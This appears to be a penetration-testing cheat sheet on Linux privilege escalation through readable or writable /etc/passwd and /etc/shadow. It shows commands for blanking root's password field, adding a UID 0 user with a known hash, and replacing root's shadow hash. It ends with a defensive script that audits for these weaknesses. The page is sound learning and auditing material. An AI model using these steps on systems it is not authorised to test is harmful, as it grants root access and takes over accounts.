# /etc/passwd & /etc/shadow

## /etc/passwd readable - root no password?

Check whether the password field (second field) of the root entry is empty instead of `x`:

```shell-session
$ head -n 1 /etc/passwd
root::0:0:root:/root:/bin/bash
$ su
```

## /etc/passwd writable

### Change root line (remove x):

Before:

```shell-session
root:x:0:0:root:/root:/bin/bash
```

After:

```shell-session
root::0:0:root:/root:/bin/bash
```

{% content-ref url="capabilities" %}
[capabilities](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/capabilities)
{% endcontent-ref %}

### Create new user

1. Create a password hash: `openssl passwd -1 -salt [salt] [password]` \
   Ex: \
   `openssl passwd -1 -salt new 123` \
   `$1$new$p7ptkEKU1HnaHpRtzNizS1`
2. Add a new entry to `/etc/passwd`: \
   Ex:\
   `new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash`
3. Switch to the new user\
   `su new`\
   `password: 123`\
   `id`\
   `uid=0(new) gid=0(root) groups=0(root)`

{% embed url="<https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/>" %}

## /etc/shadow readable

Crack hashes

{% content-ref url="../../cracking" %}
[cracking](https://0xss0rz.gitbook.io/0xss0rz/pentest/cracking)
{% endcontent-ref %}

### Users with no password

```
awk -F: '($2=="") {print $1}' /etc/shadow
```

## /etc/shadow writable

1. Generate a new password hash with a password of your choice: `mkpasswd -m sha-512 newpasswordhere`
2. Edit the `/etc/shadow` file and replace the original root user's password hash with the one you just generated.
3. Switch to the root user, using the new password:

   `su root`
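
The conditions this page depends on (empty password fields, a hash stored directly in `/etc/passwd`, extra UID 0 accounts, loose file modes) can be checked from the defender's side. The script below is an added example, not part of the original page; the function names `check_mode`, `audit_accounts` and `audit_demo` and the finding labels are hypothetical, and the sample files are constructed from the entries shown above.

```shell
#!/bin/sh
# Added example (not from the original page): audit passwd/shadow-format files.

# Report a file that "other" can write, or (for shadow) that "other" can read.
check_mode() {
    [ -e "$1" ] || return 0
    [ -z "$(find "$1" -prune -perm -002)" ] || echo "WORLD_WRITABLE $1"
    if [ "$2" = secret ] && [ -n "$(find "$1" -prune -perm -004)" ]; then
        echo "WORLD_READABLE $1"
    fi
}

# audit_accounts [passwd_file] [shadow_file]; defaults to the live system files.
audit_accounts() {
    passwd_file=${1:-/etc/passwd}
    shadow_file=${2:-/etc/shadow}
    check_mode "$passwd_file" public
    check_mode "$shadow_file" secret
    # passwd: field 2 should be "x" (hash kept in shadow); UID 0 in field 3 is root-equivalent.
    awk -F: '
        /^#/ || NF < 4 { next }
        $2 == "" { print "EMPTY_PASSWORD passwd " $1 }
        $2 != "" && $2 != "x" && $2 !~ /^[*!]/ { print "HASH_IN_PASSWD " $1 }
        $3 == 0 && $1 != "root" { print "EXTRA_UID0 " $1 }
    ' "$passwd_file"
    # shadow: an empty field 2 means the account has no password set.
    if [ -r "$shadow_file" ]; then
        awk -F: 'NF > 1 && $2 == "" { print "EMPTY_PASSWORD shadow " $1 }' "$shadow_file"
    fi
    return 0
}

# Constructed sample data reproducing the entries shown on this page.
audit_demo() {
    d=$(mktemp -d) || return 1
    cat > "$d/passwd" <<'EOF'
root::0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
EOF
    printf '%s\n' 'root:*:19000:0:99999:7:::' 'svc::19000:0:99999:7:::' > "$d/shadow"
    chmod 646 "$d/passwd"; chmod 644 "$d/shadow"
    audit_accounts "$d/passwd" "$d/shadow"
    rm -rf "$d"
}

audit_demo
```

Called with no arguments, `audit_accounts` reads the live `/etc/passwd` and `/etc/shadow`; the shadow content check is skipped when the file is not readable by the calling user.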
